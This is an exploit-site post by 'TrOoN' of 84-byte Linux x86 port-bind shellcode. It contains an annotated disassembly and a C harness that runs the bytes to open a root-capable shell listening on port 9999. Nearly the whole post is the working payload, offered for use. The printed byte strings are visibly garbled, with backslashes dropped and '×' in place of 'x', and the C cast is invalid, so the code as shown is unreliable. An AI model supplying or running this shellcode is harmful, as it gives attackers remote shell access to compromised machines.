[linux/x86] – linux/x86 – port bind shellcode 84 bytes
# Title : Shellcode – porT bind (84 bytes)
# Author :TrOoN
# E-mail : SOUrRce-x@live.fr | www.facebook.com/fysl.fyslm
# Home : city 617 logts : Draria . algeria
# Web Site : www.1337day.com
# platform :Linux/x86 | uBuntU Fr
# Type : local exploit /SHELL CODE /ETc…
###
*
* 8048304: 6a 66 push $0×66
* 8048306: 58 pop %eax
* 8048307: 6a 01 push $0×1
* 8048309: 5b pop %ebx
* 804830a: 99 cltd
* 804830b: 52 push %edx
* 804830c: 53 push %ebx
* 804830d: 6a 02 push $0×2
* 804830f: 89 e1 mov %esp,%ecx
* 8048311: cd 80 int $0×80
* 8048313: 52 push %edx
* 8048314: 43 inc %ebx
* 8048315: 68 ff 02 0a 93 push $0×930a02ff
* 804831a: 89 e1 mov %esp,%ecx
* 804831c: 6a 10 push $0×10
* 804831e: 51 push %ecx
* 804831f: 50 push %eax
* 8048320: 89 e1 mov %esp,%ecx
* 8048322: 89 c6 mov %eax,%esi
* 8048324: b0 66 mov $0×66,%al
* 8048326: cd 80 int $0×80
* 8048328: 43 inc %ebx
* 8048329: 43 inc %ebx
* 804832a: b0 66 mov $0×66,%al
* 804832c: cd 80 int $0×80
* 804832e: 52 push %edx
* 804832f: 56 push %esi
* 8048330: 89 e1 mov %esp,%ecx
* 8048332: 43 inc %ebx
* 8048333: b0 66 mov $0×66,%al
* 8048335: cd 80 int $0×80
* 8048337 89 d9 mov %ebx,%ecx
* 8048339: 89 c3 mov %eax,%ebx
* 804833b: b0 3f mov $0×3f,%al
* 804833d: 49 dec %ecx
* 804833e: cd 80 int $0×80
* 8048340: 41 inc %ecx
* 8048341: e2 f8 loop 804833b
* 8048343: 52 push %edx
* 8048344: 68 6e 2f 73 68 push $0×68732f6e
* 8048349: 68 2f 2f 62 69 push $0×69622f2f
* 804834e: 89 e3 mov %esp,%ebx
* 8048350: 52 push %edx
* 8048351: 53 push %ebx
* 8048352: 89 e1 mov %esp,%ecx
* 8048354: b0 0b mov $0xb,%al
* 8048356: cd 80 int $0×80
*
*/
#include <stdio.h>
#define L_PORT "x0ax93" /* Port 9999 */
char shellcode[] = "x6ax66×58x6ax01×5bx99×52x53×6ax02×89"
"xe1xcdx80×52x43×68xffx02"L_PORT"x89xe1"
"x6ax10×51x50×89xe1×89xc6xb0×66xcdx80"
"x43×43xb0×66xcdx80×52x56×89xe1×43xb0"
"x66xcdx80×89xd9×89xc3xb0×3fx49xcdx80"
"x41xe2xf8×52x68×6ex2fx73×68x68×2fx2f"
"x62×69x89xe3×52x53×89xe1xb0×0bxcdx80";
main()
{
void (*f)();
(long) f = &shellcode;
fprintf(stdout, "lenght: %d bytesn", sizeof(shellcode) – 1);
f();
}
################################################ TrOon ######################################
team mosta – exploit-bd – security-ray – hacker fire – elite_troJn – hacker-1420 – bResCo-Dz -
turkhackteam.NET – aLl algeRian hackXOR
# [1337day.com][1] [2012-01-27]
[1]: http://www.1337day.com/
Leave a Reply